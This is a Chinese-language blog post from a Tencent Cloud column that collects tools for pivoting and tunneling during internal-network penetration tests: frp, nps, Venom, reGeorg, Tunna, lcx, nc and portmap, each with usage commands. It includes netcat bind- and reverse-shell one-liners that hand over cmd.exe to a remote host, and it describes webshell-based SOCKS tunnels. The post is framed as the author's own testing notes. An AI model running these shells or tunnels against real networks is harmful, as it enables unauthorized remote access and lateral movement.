前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >代理与转发常用工具汇总

代理与转发常用工具汇总

作者头像
用户5878089
发布2021-03-11 14:51:10
2.4K0
发布2021-03-11 14:51:10
举报

自己对内网渗透搭建链路上很不熟练,乘着出差路上测试一下,有不当之处多多指正。好久不发文了,居然有付费阅读了,借此机会测试一下,内容比较粗糙,后期在全文发。相关工具在后台回复“01代理转发”可以获取下载链接。

内网穿透工具

frp

frp 是一个专注于内网穿透的高性能的反向代理应用,支持 TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网。

https://github.com/fatedier/frp

参考链接

https://sspai.com/post/52523

代码语言:javascript
复制
服务端
frps.exe -c frps.ini
客户端
frps.exe -c frpc.ini

[common]
server_addr = xxx
server_port = 7000
auth_token = {auth_token}
privilege_token = {privilege_token}

[http]
type = http
local_ip = 127.0.0.1
local_port = 80

[https]
type = https
local_ip = 127.0.0.1
local_port = 443

[ssh]
type = tcp
local_port = 22
remote_port = 5555


可以把22端口代理出去成为5555端口

nps

nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理p2p等,并带有功能强大的web管理端。

https://github.com/ehang-io/nps/blob/master/README_zh.md

代理工具

Termite

是EW(EarthWorm)的最新版,

官方链接:http://rootkiter.com/Termite/

其他的作用都很好就是起代理的时候没有测试成功,不知道为什么

Venom

https://github.com/Dliv3/Venom

这个比较好用

在本地

代码语言:javascript
复制
./admin_macos_x64 -lport 9999

在跳板机

代码语言:javascript
复制
./agent_linux_x64 -rhost 192.168.0.103 -rport 9999

然后在本地就可以socks代理

本地代理客户段可以使用

冰蝎(测试成功)

通过冰蝎的内网穿透功能可以起socks代理,测试成功。

reGeorg (测试成功)

工具地址:https://github.com/sensepost/reGeorg

reGeorg 是 reDuh 的升级版,主要是把内网服务器的端口通过 http/https 隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。它利用 webshell 建立一个 socks 代理进行内网穿透,服务器必须支持 aspx、php 或 jsp 这些 web 程序中的一种。

代码语言:javascript
复制
 python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp

Tunna

https://github.com/SECFORCE/Tunna

一个很老的代理工具了,同样需要把文件上传到目标的web服务器上。

代码语言:javascript
复制
python proxy.py  -u http://192.168.255.161/3.php -l 1234

需要目标服务器开启socket扩展。

转发工具

windows

lcx.exe(没有测试成功)

第一种用法:

代码语言:javascript
复制
 1.1.1.1: lcx -listen 1111 2222
 2.2.2.2: lcx -slave 1.1.1.1 1111 3.3.3.3 3389

然后,其他机器访问1.1.1.1的2222端口,就相当于访问了3.3.3.3的3389端口。

第二种用法:

代码语言:javascript
复制
 1.1.1.1: lcx -tran 2222 2.2.2.2 3389

然后,访问1.1.1.1的2222端口,就相当于访问了2.2.2.2的3389端口。

nc(测试成功)

第一种用法:正向连接

在内网主机(1.1.1.1)上执行

代码语言:javascript
复制
1.1.1.1   nc -l -p 4444 -t -e cmd.exe

公网主机(2.2.2.2)上远程连接

nc 1.1.1.1 4444

telnet 1.1.1.1 4444

第二种用法:反向连接

在公网主机(2.2.2.2)上监听端口:

代码语言:javascript
复制
2.2.2.2 nc -lvp 4444

在内网主机(1.1.1.1)上远程回连:

代码语言:javascript
复制
nc -t -e cmd.exe 公网主机ip 4444

linux

portmap

先在具有公网ip的主机上执行:

代码语言:javascript
复制
./portmap -m 2 -p1 6666 -h2 公网主机ip -p2 7777
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2021-02-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 无级安全 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 内网穿透工具
  • frp
  • nps
  • 代理工具
  • Termite
  • Venom
  • 冰蝎(测试成功)
  • reGeorg (测试成功)
  • Tunna
  • 转发工具
  • windows
  • lcx.exe(没有测试成功)
  • nc(测试成功)
  • linux
  • portmap
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档